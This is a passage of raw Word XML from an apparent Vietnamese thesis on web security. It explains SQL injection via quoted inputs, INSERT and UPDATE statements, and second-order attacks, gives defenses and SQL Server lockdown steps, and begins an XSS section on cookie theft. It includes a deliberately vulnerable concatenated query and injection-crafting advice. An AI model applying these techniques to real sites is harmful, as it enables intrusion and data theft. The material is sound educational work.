        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00D9523B" w:rsidRPr="00D9523B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A72CE40" w14:textId="77777777" w:rsidR="00D9523B" w:rsidRPr="00D9523B" w:rsidRDefault="00D9523B" w:rsidP="00E42092">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9523B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Khái niệm Quote Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACC9EB8" w14:textId="77777777" w:rsidR="00107BF3" w:rsidRDefault="00D9523B" w:rsidP="00E42092">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9523B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Những trường hợp đối số được nhập vào đều được ứng dụng cho vào giữa hai dấu nháy đơn hay ngoặc kép là trường hợp Quote Injection. Ví dụ III.2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AF00FC" w14:textId="4E9A896C" w:rsidR="00D9523B" w:rsidRDefault="00107BF3" w:rsidP="00E4209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7E06F50" wp14:editId="109BA5D5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>902335</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>290830</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5296535" cy="82867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828675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00D9523B" w:rsidRPr="00D9523B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ví dụ 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB4D941" w14:textId="50B97F01" w:rsidR="00D9523B" w:rsidRPr="00D9523B" w:rsidRDefault="00107BF3" w:rsidP="00E42092">
      <w:pPr>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3360" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B7FC79A" wp14:editId="3E359E2B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>932180</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1395095</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5260340" cy="474345"/>
                <wp:effectExtent l="0" t="0" r="16510" b="2095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474345"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E6E6E6"/>
                        </a:solidFill>
                        <a:ln w="6096">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0B838B2F" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="003A61ED">
                            <w:pPr>
                              <w:spacing w:before="29" w:line="369" w:lineRule="auto"/>
                              <w:ind w:left="106" w:right="211"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                              <w:t>StrSQL=“SELECT tkUsername FROM User WHERE tkUsername=’”&amp; tName &amp; “’”</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3394E031" w14:textId="11A895B2" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="00D9523B">
                            <w:pPr>
                              <w:spacing w:before="30"/>
                              <w:ind w:left="106"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                                <w:sz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FC79A" id="Text Box 28" o:spid="_x0000_s1096" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:73.4pt;margin-top:109.85pt;width:414.2pt;height:37.35p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" fillcolor="#e6e6e6" strokeweight=".48pt">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0B838B2F" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="003A61ED">
                      <w:pPr>
                        <w:spacing w:before="29" w:line="369" w:lineRule="auto"/>
                        <w:ind w:left="106" w:right="211"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>StrSQL=“SELECT tkUsername FROM User WHERE tkUsername=’”&amp; tName &amp; “’”</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3394E031" w14:textId="11A895B2" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="00D9523B">
                      <w:pPr>
                        <w:spacing w:before="30"/>
                        <w:ind w:left="106"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D9523B" w:rsidRPr="00D9523B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Để vô hiệu hoá dấu nháy và thay đổi câu lệnh mà vẫn giữ được cú pháp đúng,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D9523B" w:rsidRPr="00D9523B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>chuỗi mã chèn thêm vào phải có một dấu nháy đơn trước chuỗi kí tự được chèn  vào và ở cuối câu lệnh phải có một dấu nháy đơn, chẳng hạn như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229B4946" w14:textId="774A2320" w:rsidR="003A61ED" w:rsidRPr="00107BF3" w:rsidRDefault="003A61ED" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="94" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="911"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nếu đã thực hiện như trên mà thông báo lỗi có liên quan đến dấu “(“ </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>thì trong  chuỗi chèn vào phải có</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>“)”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A30DBC4" w14:textId="4F6BD561" w:rsidR="003A61ED" w:rsidRDefault="006B3B79" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A61ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tần công qua câu INSERT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF6070B" w14:textId="791FF8A1"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ừ khoá INSERT dùng để đưa thông tin vào cơ sở dữ liệu.  Thông  thường câu  lệnh INSERT được dùng trong các trường hợp như: thông tin đăng kí người sử dụng, guestbook…v..v…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD0A694" w14:textId="53994122"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ĩ thuật “;”, “--“ được dùng như đã từng dùng với câu lệnh SELECT, phải đảm  bảo đúng số lượng và kiểu giá trị được nhập vào nhằm tránh lỗi về cú pháp (nếu không xác định được kiểu dữ liệu có thể nhập tất cả là số).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383C8522" w14:textId="71BF23C1" w:rsidR="006B3B79" w:rsidRDefault="006B3B79" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A61ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tấn công qua câu UPDATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCBA5F0" w14:textId="057D69A7"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Update được sử dụng trong lập trình Web với mục đích  giảm sự phức  tạp trong ứng dụng và tránh sự tấn công trong kĩ thuật SQL Injection. Tuy nhiên hacker vẫn có thể lợi dụng những Stored Procedure để tấn công vào hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06381C07" w14:textId="4D351735" w:rsidR="006B3B79" w:rsidRDefault="006B3B79" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Một số cách tấn công khác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C835AF" w14:textId="3CDE1606"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Chuỗi kí tự không có dấu nháy đơn:</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Những nhà lập trình có thể bảo vệ ứng dụng của họ bằng cách loại bỏ tất cả   dấu nháy, thông thường loại bỏ dấu nháy bằng cách thay một dấu nháy thành 2 dấu nháy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300EFC0A" w14:textId="66350BFF"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ấn công 2 tầng</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Mặc dù ứng dụng đã thay thế dấu nháy đơn nhưng vẫn còn khả năng bị chèn</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đoạn mã SQL .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFD861A" w14:textId="40893EDE" w:rsidR="006B3B79"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21" w:name="_Toc59634025"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cách phòng chống</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="39B8D72F" w14:textId="1D6818FC"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rong hầu hết trình duyệt, những kí tự nên được mã hoá trên địa chỉ URL trước  khi được sử dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0323FE7E" w14:textId="6199D2B3"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Việc tấn công theo SQL Injection dựa vào những câu thông báo lỗi do đó việc phòng chống hay nhất vẫn là không cho hiển thị những thông điệp lỗi cho người dùng bằng cách thay thế những lỗi thông báo bằng 1 trang do người phát  triển  thiết kế mỗi khi lỗi xảy ra trên ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F03D465"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kĩ giá trị nhập vào của người dùng, thay thế những kí tự như ‘ ; v..v..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FAE96C"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Hãy loại bỏ các kí tự meta như “',",/,\,;“ và các kí tự extend như NULL, CR, LF, ... trong các string nhận được từ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8C2E1E"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dữ liệu nhập do người dùng đệ trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6419D5C4"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các tham số từ URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E8028B" w14:textId="3842573F" w:rsidR="003A61ED" w:rsidRPr="003A61ED"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các giá trị từ cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B682CA" w14:textId="45537FF4"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lastRenderedPageBreak/>
        <w:t>Đối với các giá trị numeric, hãy chuyển nó sang integer trước khi thực hiện câu  truy vấn SQL, hoặc dùng ISNUMERIC để chắc chắn nó là một số integer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D042E53" w14:textId="4CB10445"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Dùng thuật toán để mã hoá dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7908D43B" w14:textId="63ACE007"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dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65491260" w14:textId="01C794B5"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tính đúng đắn của dữ liệu là 1 vấn đề phức tạp và thường chưa được   quan tâm đúng mức trong các ứng dụng. Khuynh hướng của việc kiểm tra tính đúng đắn của dữ liệu không phải là chỉ cần thêm một số chức năng vào ứng dụng, mà phải kiểm tra một cách tổng quát nhanh chóng để đạt được mục đích.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4923F7E1"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Những tóm tắt sau đây sẽ bàn về việc kiểm tra tính đúng đắn của dữ liệu, cùng với ví dụ mẫu để minh hoạ cho vấn đề này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C1FE02"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Có ba giải pháp tiếp cận vấn đề này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78793F97"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Cố gắng kiểm tra và chỉnh sửa để làm cho dữ liệu hợp lệ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E26C945" w14:textId="77777777" w:rsidR="00107BF3" w:rsidRDefault="00107BF3"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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A61ED" w:rsidRPr="003A61ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Loại bỏ những dữ liệu bất hợp lệ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B00579" w14:textId="6218FFFB" w:rsidR="003A61ED" w:rsidRPr="00107BF3" w:rsidRDefault="00107BF3"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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A61ED" w:rsidRPr="003A61ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Chỉ chấp nhận những dữ liệu hợp lệ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE87ED4"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Giải pháp 1: khó thực hiện</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343D64B5"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hứ nhất, người lập trình không cần thiết phải biết tất cả dữ liệu bất  hợp  lệ,  bởi vì những dạng dữ liệu bất hợp lệ rất đa dạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F412942" w14:textId="45BE9126" w:rsidR="003A61ED" w:rsidRP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hứ hai, là vấn đề của trường hợp bị tấn công 2 tầng (second-oder SQL injection) trong việc lấy dữ liệu từ hệ thống ra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4186F7C7" w14:textId="7C117C42"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Giải pháp 2: bị vô hiệu trong các trường hợp như giải pháp 1 là do:</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Dữ liệu bất hợp lệ luôn luôn thay đổi và cùng với việc phát triển các kiểu tấn công mới.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6537F1" w14:textId="049E938D"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Giải pháp 3: tốt hơn hai giải pháp kia, nhưng sẽ gặp một số hạn chế khi cài</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đặt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421FF217" w14:textId="0858D5B9"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Cách bảo mật tốt nhất là kết hợp cả giải pháp 2 và 3. Một ví dụ cho sự cần   thiết kết hợp 2-3 là dấu nối giữa họ và tên “Quentin Bassington-Bassington” phải cho phép dấu gạch ngang trong bộ định nghĩa dữ liệu hợp lệ, nhưng chuỗi kí tự “--“ là một chuỗi kí tự đặc biệt trong SQL server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25852A73" w14:textId="00BA46FD"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Ví dụ nếu có bộ lọc để:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3150E02C" w14:textId="77777777" w:rsidR="00107BF3" w:rsidRDefault="00107BF3"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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A61ED" w:rsidRPr="003A61ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lọc bỏ những dữ liệu bất hợp lệ như ‘--‘,’select’ và ‘union’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411677F9" w14:textId="4EA52A34" w:rsidR="003A61ED"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Một hàm kiểm soát để loại bỏ dấu nháy đơn thì có thể đối phó như sau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101FA638" w14:textId="41BA192F"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hoá chặt SQL Server (SQL Server Lockdown)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56179085" w14:textId="4BBAC65C" w:rsidR="00107BF3"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Luận văn cũng giới thiệu một phương pháp bảo mật ở mức độ quản trị cơ sở dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBA28B0"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lastRenderedPageBreak/>
        <w:t>Đây là một danh sách các công việc cần làm để bảo vệ SQL server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EF6696"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Xác định các phương pháp kết nối đến server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444DD50F"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Dùng tiện ích Network Utility để kiểm tra rằng chỉ có các thư viện mạng</w:t>
      </w:r>
      <w:r w:rsidR="00107BF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00107BF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>đang dùng là hoat động.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F18AC21"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tất cả các tài khoản có trong SQL Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D07DDEF"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Chỉ tạo tài khoản có quyền thấp cho các ứng dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8B599A"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Loại bỏ những tài khoản không cần thiết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1817507A"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Đảm bảo rằng tất cả tài khoản có một mật khẩu hợp lệ, …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EA7423"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các đối tượng tồn tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E12B428"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Nhiều extended stored procedure có thể được xoá bỏ  một cách an toàn.  Nếu điều này được thực hiện, thì cũng nên xem xét việc loại bỏ luôn    những tập tin .dll chứa mã của các extended stored procedure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E4C611"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Xoá bỏ tất cả cơ sở dữ liệu mẫu như “northwind” và “pubs”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4D0665" w14:textId="2ABC4661" w:rsidR="003A61ED" w:rsidRPr="003A61ED" w:rsidRDefault="00107BF3" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A61ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A61ED" w:rsidRPr="003A61ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Xóa các stored procedure không dùng như: master..xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054FBE5A"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những tài khoản nào có thể truy xuất đến những đối tượng nào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A138D7"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Đối với những tài khoản của một ứng dụng nào đó dùng để truy xuất cơ sở dữ liệu thì chỉ được cấp những quyền hạn cần thiết tối thiểu để truy xuất  đến những đối tượng nó cần dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE9EBF1" w14:textId="77777777" w:rsid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lớp sửa chữa của server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A237D87"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Có một số cách tấn công  như “buffer overflow”, “format string” thường  chú ý đến lớp bảo vệ này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29979026" w14:textId="77777777" w:rsidR="00107BF3" w:rsidRDefault="003A61ED"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Kiểm tra các phiên làm việc trên server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E5C689" w14:textId="0C54BB06" w:rsidR="003A61ED" w:rsidRPr="00107BF3" w:rsidRDefault="003A61ED" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Thay đổi "Startup và chạy SQL Server" ở mức người dùng quyền hạn thấp trong SQL Server Security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1591A100" w14:textId="7C0D5A6E" w:rsidR="00EC7A6B" w:rsidRDefault="00903C21" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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bookmarkStart w:id="22" w:name="_Toc59634026"/>
      <w:r w:rsidR="00EC7A6B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Chèn mã lệnh thực thi trên trình duyệt nạn nhân (Cross Side Scripting)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="1FF9A557" w14:textId="4FF564C1" w:rsidR="00EC7A6B"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23" w:name="_Toc59634027"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Khái niệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="28BD7B8C" w14:textId="5582FBFC" w:rsidR="00233B56" w:rsidRPr="008872A1"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 xml:space="preserve">Phương pháp Cross Site Scripting (được viết tắt là XSS) là phương pháp tấn công  bằng cách chèn thêm những đoạn mã có khả năng đánh cắp hay thiết lập được những thông tin quan trọng như cookies, mật khẩu,… vào mã nguồn ứng dụng web để từ đó </w:t>
      </w:r>
      <w:r w:rsidRPr="00233B56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>chúng được chạy như là một phần của ứng dụng Web và có chức năng cung cấp hoặc thực hiện những những điều hacker muốn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218F7AED" w14:textId="77D4E76C" w:rsidR="00233B56" w:rsidRPr="008872A1"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Phương pháp này không nhằm vào máy chủ hệ thống mà chủ yếu tấn công trên chính máy người sử dụng. Hacker sẽ lợi dụng sự kiểm tra lỏng lẻo từ ứng dụng và hiểu biết hạn chế của người dùng cũng như biết đánh vào sự tò mò của họ dẫn đến người dùng bị mất thông tin một cách dễ dàng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142732C2" w14:textId="2B9A1824" w:rsid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Thông thường hacker lợi dụng địa chỉ URL để đưa ra những liên kết là tác nhân kích hoạt những đoạn chương trình được viết bằng ngôn ngữ máy khách như VBScript, JavaScript…được thực thi trên chính trình duyệt của nạn nhân.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E77E03E" w14:textId="7B70AF84" w:rsidR="00EC7A6B"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24" w:name="_Toc59634028"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Phương pháp tấn công XSS truyền thống</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="2D0A52FD" w14:textId="134F932D" w:rsidR="00233B56" w:rsidRDefault="00233B56" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Ứng dụng Web thường lưu trữ thông tin quan  trọng ở cookie. Cookie  là mẩu thông  tin mà ứng dụng lưu trên đĩa cứng của người sử dụng. Nhưng chỉ ứng dụng thiết lập   ra cookie thì mới có thể đọc nó. Do đó chỉ khi người dùng đang trong phiên làm việc của ứng dụng thì hacker mới có cơ hội đánh cắp cookie. Công việc  đầu tiên của  hacker là tìm trang đích để dụ người dùng đăng nhập sau khi đã tìm ra lỗ hổng trên  ứng dụng đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2EC10C" w14:textId="15B4E95D" w:rsidR="005C5B18" w:rsidRPr="00107BF3" w:rsidRDefault="00107BF3" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
